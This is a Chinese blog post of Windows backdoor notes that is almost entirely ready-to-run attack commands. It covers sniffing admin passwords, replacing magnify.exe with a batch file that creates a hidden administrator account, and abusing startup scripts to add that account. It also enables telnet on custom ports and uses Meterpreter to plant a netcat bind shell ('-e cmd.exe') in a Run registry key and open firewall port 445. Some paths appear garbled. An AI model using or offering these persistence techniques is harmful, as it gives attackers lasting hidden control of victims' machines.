zoukankan      html  css  js  c++  java
  • Windows后门小计

    嗅探欺骗:



    在目标机上安装嗅探工具窃取管理员的密码

    放大镜替换:


     

    构造批处理:

      @echo off
      net user gslw$ test168 /add
      net localgroup administrators gslw$ /add
      %Windir%system32 agnify.exe
      exit
    转换exe文件:
    battoexe等工具
    文件替换:
      @echo off
      copy %Windir%system32dllcachemagnify.exe nagnify.exe
      copy %Windir%system32magnify.exe nagnify.exe
      replace.exe %Windir%magnify.exe %Windir%system32dllcache
      replace.exe %Windir%magnify.exe %Windir%system32
      exit
    后门利用:
    Win+U启动辅助工具项,打开放大镜即可

    组策略欺骗:



    在windows开关机启动脚本中做手脚:
    @echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

    telnet利用:



    远程改端口:“tlntadmn config \192.168.1.9 port=800 -u gslw -p test168 ”
    在目标机开启:
    tlntadmn config port=2233 //修改 telnet默认端口
    sc config tlntsvr start= auto //设置启动类型为自启动
    net start telnet //开启telnet服务项
    tlntadmn config sec =passwd //设置密码
    tlntadmn config port = 800 //设置端口
    远程登陆:telnet 192.168.1.9 800 //键入账号密码即可连接

    msf(Netcat.exe):



    上传到目标系统:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    查看自启:meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    设置自启:meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32 c.exe -Ldp 445 -e cmd.exe'
    检查确认:meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
    打开cmd :meterpreter > execute -f cmd -i
    开放445端口:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
    检查是配置:netsh firewall show portopening
    后门使用:nc -v 172.16.104.128 445

  • 相关阅读:
    ajaxUtil
    AJAX学习-----与 XML 文件进行交互式通信
    AJAX-----数据库实例
    AJAX学习-----服务器响应
    AJAX学习-----ASP/PHP 请求实例
    scrapy 反扒措施
    scrapy 中文官网学习
    scrapy 破解图片网站防盗链下载
    scrapy 随机中间件配置
    flask 邮件发送
  • 原文地址:https://www.cnblogs.com/feiyucha/p/9903588.html
Copyright © 2011-2022 走看看